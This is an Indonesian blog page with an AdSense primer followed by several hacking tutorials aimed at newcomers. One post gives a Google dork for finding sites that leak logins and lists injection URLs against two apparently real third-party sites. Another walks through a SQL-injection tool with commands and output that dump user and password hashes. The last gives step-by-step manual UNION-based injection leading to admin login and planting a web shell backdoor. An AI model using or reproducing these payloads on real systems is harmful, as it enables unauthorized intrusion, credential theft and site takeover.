Sporty Magazine official website | Members area : Register | Sign in

Belajar Adsense Google

Rabu, 05 Januari 2011

Basic tentang GoogleAdsense :

AWALNYA :
Beberapa tahun yang lalu, Google mulai menerima pemasangan iklan via banner dalam setiap proses pencarian via www.google.com. Google menyebut programnya ini dng nama : Google Adwords. Kemudian Google juga menawarkan kepada para pemilik website untuk ikut menampilkan iklan dari Google ini, dengan bayaran system bagi hasil 'pembayaran setiap klik' . Jadi jika pemasang iklan via Adwords membayar sekian dollar/sen kepada Google untuk setiap klik iklan mereka, maka sebagian akan diberikan ke pemilik website yang ikut program ini, disebut Google Adsense.

Dari pengamatan saya, member Google Adsense dibagi menjadi 2 macam :
1. websitenya yang menggantungkan 100% dari Adsense
2. adsense digunakan sebagai penghasilan tambahan dari content asli website itu.

Ciri-ciri no. 1 adalah isi website tidak adanya content yang kuat, misal: Blog kalau ciri no 2 adalah isi websitenya berisikan content yang jelas , misal : toko online, komunitas, product barang, dll.

SAAT MENDAFTAR KE GOOGLE ADSENSE :
- Sebelum mendaftar, siapkan website yang akan didaftarkan, berbahasa inggris lebih baik dari pada berbahasa indonesia. mempunyai domain sendiri lebih besar kans nya untuk diterima oleh google. Website ini hanya untuk saat pendaftaran, sebab kemudian hari adsense bisa terima sampai 200 website dalam satu account. Usahakan website sudah berisi dan jelas isinya saat mendaftar.
- Saat mengisi formulir, jangan memasukkan informasi yang salah atau fiktif! (ciri khas orang indonesia di internet..he..he), semua apa adanya, sebab ini nanti hubungannya dengan alamat pembayaran.
Nama dan alamat jangan sampai salah satu karakter-pun, sebab bisa merepotkan diri sendiri saat terima pembayaran (Cek), usahakan sama dengan alamat di KTP anda.

SETELAH PENDAFTARAN DITERIMA :
- Masukkan kode script adsense ke website anda.
- Promosikan website anda, cara promosi banyak sekali, bentuk promosi yang paling bagus adalah via Search Engine, ada 3 search engine yang paling penting : 1. Google, 2. Yahoo dan 3. MSN
- Jangan mencoba melakukan spam dng sering meng-clik website anda sendiri, jika ketahuan bisa di banned oleh system di GA (Google Adsense). System penentuan sah tidaknya suatu klik pada banner iklan adsense sudah dibuat lumayan canggih, tidak berdasarkan ip address saja, namun berdasarkan beberapa kriteria tertentu (yang kurang etis kalau saya jabarkan disini), jangan terfokus bagaimana meng-akali system di GA (he..he..ciri orang indonesia di internet lagi), fokus saja di promosi dan isi content website anda.

PEMBAYARAN OLEH GA :
- Saat total pendapatan anda di GA mencapai $50, maka akan dikirim pin untuk konfirmasi, namun ini tidak selalu ada, kalau tidak pernah terima pin tak masalah.
- Jika total pembayaran sudah mencapai diatas $100, maka GA akan segera membuatkan sebuah cek untuk anda, ke alamat anda saat mendaftar.
- Pengiriman cek oleh GA bisa dua macam :
1. via pos biasa (bisa sampai 2 bulan terimanya), untuk member GA dari Indonesia biasanya dikirim dari Malmo, Swedia. Pengiriman ini tanpa biaya (ditanggung oleh GA)
2. via courier (DHL/Fedex), waktunya hanya 5 hari sudah sampai, ada biaya : $24 untuk setiap kirim. Biasanya untuk member GA dari Indonesia dikirim dari Dublin, Irlandia
- Cek GA biasanya dari Bank HSBC atau CItibank.
- Untuk proses pencarian bisa dilakukan di setiap bank ternama di indonesia (dng aturan sendiri2), proses cairnya sekitar 3 minggu dan ada biaya fee untuk bank itu (sekitar $10an)

LAIN-LAIN :
- Sejak pendapatan anda mencapai $100, jika via kantor pos, maka terima uangnya bisa makan waktu 4 bulan (1 bulan untuk proses di GA, 2 bulan untuk kirim pos, 1 bulan untuk pencairan), memang lama, namun anggap saja investasi jangka panjang.
- Jika pendapatan anda belum besar dan tergesa, lebih baik US$ dari GA di hold dulu (ada fasilitas ini di menu member), kumpulkan hasil dari beberapa bulan dulu , jika sudah dirasa besar jumlahnya, barulah minta dikirim!, kirim via DHL/Fedex lebih cepat dan lebih aman untuk jumlah yang besar.
- Jika pengiriman via kantor pos dan sampai 2 bulan belum tiba, anda bisa minta ganti cek, maka cek yang lama sudah tidak berlaku lagi. Cek hanya bisa dicairkan oleh nama yang tertera disitu, jadi aman.

LAST COMMENT :
- Belajar GA adalah suatu bentuk Internet Marketing sesungguhnya, bisa dijadikan investasi yang bagus untuk masa-depan anda, pada awalnya anda harus repot banyak seperti : menyiapkan content, website, promo, promo, terus promo, namun jika suatu saat penghasilan sudah mulai besar, maka bisa dikatakan bahwa pendapatan anda akan stabil di angka itu terus tiap bulannya, naik turun sedikit itu maklum (kecuali server down), semakin dipromosikan lagi semakin besar pendapatan anda tiap bulannya.

Hacking lagi Hacking lagi

Minggu, 25 April 2010

ternyata hacking dan mendapat gelar seorang hacker itu tidak semua yang orang-orang bayangkan. banyak yang harus dikorbankan untuk mencapai tujuan itu.

untuk menjadi seorang hacker menurut saya itu tidak cukup dengan kemauan doank. karena masih banyak faktor penunjang yang tidak kalah pentingnya dengan kemauan.

kebanyakan orang mengatakan " dimana ada kemauan disitu ada jalan" memang tidak salah seeh tapi ada hal yang harus kita perhatikan. ada unsur penunjang kemauan itu.

contohnya.
kemauan kita besar untuk menjadi seorang hacker tapi sarana kita untuk bergerak tidak ada. moso mau jadi hacker gag punya koneksi internet atau gag punya kompi sendiri. heheheheh

jadi bukan kemauan segalanya tapi modal juga perlu.

selain itu masih ada pengorbanan yang lain, seperti : harus rela mata melek sampai pagi karena untuk belajar pada seorang ahli secara langsung itu perlu hunting kiri dan kanan untuk mencari suhu... hehehehehe

mungkin cukup dulu yah....

mohon maaf kepada master2 jika artikel ini salah

simple hacking for you

Selasa, 23 Februari 2010


Banyak cara yang dapat di gunakan untuk melakukan hacking,mulai dari sql injection,rfi,lfi and dll…..tergantung dari kita sendiri ingin melakukannya dengan teknik yang mana :D .klo untuk saya pribadi tidak memilih satupun,maklum bukan hacker,cuman seorang blogger :) .Nah berikut ini ada trick yang sangat simple yang bisa di gunakan melakukan kegiatan hacking tersebut :D

buat para master atau yang udah lama bergelut di dunia hacking trik ini mungkin udah basi dan sangat mudah.jadi klo udah master gag perlu baca artikel seperti ini.ini cuman khusus untuk newbie :D

okeh!!tanpa penjelasan panjang dan lebar mari kita mulai saja :)

seperti biasa dalam melakukan kegiatan hacking persiapkan alat serta bahannya….wkwkkwk…:P

alat dan bahannya adalah :

1.komputer atau laptop yang terhubung dengan internet

2.posisi yang nyaman,gunanya biar betah tinggal depan kompi

3.cemilan :D biar gag laper

4.sebungkus rokok sampoerna

5.kopi hitam gag pake gula,buat begadang

jika alat terebut sudah lengkap silahkan menuju paman google .
nah pada form search google masukkan keyword berikut ini

inurl:group_concat(username,0x3a,password)

gag ada yang muncul yah??? kasian di blok tu baris yang kosong

kemudian liat hasil pencariannya :D

tarrrrrrrrrrraaaaaaaaa…………………………………… :D akan bermunculan site yang menanmpilkan password serta user loginnya….:D hehehehehe

contoh yang saya dapatkan :

http://www.archdiocese.la/news/story.php?newsid=-1001+union+select+1,2,3,4,5,group_concat(0×3c703e,username,0×3a,password),version(),8,9,10,11,12,13,14,15,16,17,18+from+users

http://www.cdb.gov.bt/faq.php?Id=-70+union+select+1,version(),group_concat(0×3c703e,login_name,0×3a,password)+from+users

skrg tinggal mencari halaman login adminnya :)

selamat mencoba


tutorial schemafuzz

Senin, 15 Februari 2010



Langsung aja tutornya ya :D
siapkan alat dan bahan sebagai berikut :
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD
4.Konsole (bagi pengguna linux)

bagi pengguna windust ikuti langkah berikut
buka menu CMD kemudian masuk kedalam directori Cdengan menggunakan perintah
cd c:\ enter
c:\>schemafuzz.py enter

Bagi pengguna linux tinggal mengetikkan di konsloe perintah berikut

./schemafuz.py enter

oke :)
setalah masuk ke direktory schemafuzz
tingal ikuti langkah selanjutnya

1.Cari target
Misal: http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

–schema, –dbs, –dump, –fuzz, –info, –full, –findcol

langkah pertama

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1″ –findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1–

[+] Evasion Used: “+” “–”

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns…

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5–

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

————–

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns…

[+] Found a table called: mysql.user

[+] Now searching for columns inside table “mysql.user”

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table “mysql.user” for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

—————

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D namadatabasenya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database “webthings”

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,
author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,
full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,
count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,
city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,
newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <– w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0×3a,password),2,3,4,5+FROM+mysql.user–

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dbs

akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] webthings

[-] [01:58:17]

[-] Total URL Requests 30

[-] Done

langkah selanjutnya

——————–

cara untuk menemukan user dan password

kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom

setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dump -D webthing -T wt_users -C name,password

eing ing eng….

jreennnng….keluar deh user ama passwordnya

hasilnya dibawah ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database “webthings” Table “wt_users”

[+] Column(s) ['name', 'password']

[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]

[-] Total URL Requests 4

[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya


Teknik SQL injection + Backdooring

Senin, 08 Februari 2010

teknik SQLi ini Banyak di Gunakan Oleh para hacker untuk mencari Bugs pada website Target walapun terkadang ada juga yang menggunakan Dork pada bantuan Google
"Backdooring", seperti namanya backdoor yaitu pintu belakang, artinya para hacker (Black Hat) tidak jarang melakukan ini pada website target, dengan membuat jalur sendiri untuk bisa memodifikasi Website korban tanpa harus masuk ke Admin web tersebut karena mereka biasanya telah meng Upload Shell pada web target, cara melakukan Upload Shell tidak begitu sulit, cukup mencari Fitur UPLOAD pada Menu Admin, dan Bimsalabim, NAsib Website ada di tangan Anda.
Ok, saya langsung saja menjelaskan tutorial saya ini, caranya yaitu :




1.Kita tetapkan target terlebih dahulu
contoh: [site]/news_Event/newsDetail.php?ID=2

anda tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vulnability.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'



2.mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

sekarang cek secara satu per satu
contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

sehingga muncul error atau hilang pesan error.
misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

berarti yang kita ambil adalah sampai angka 4
menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--



3.untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

nah ,yg keluar angka 2
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada angka yg keluar tadi
contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema



4.Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

jika yang kita cari adalah "admin"



5.Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :

http://tools.vyc0d.com/converter/

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e--



6.Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yang mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang :D

ket: 0x3a sama dengan : <- titik dua



8.Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
Selesai.

Categories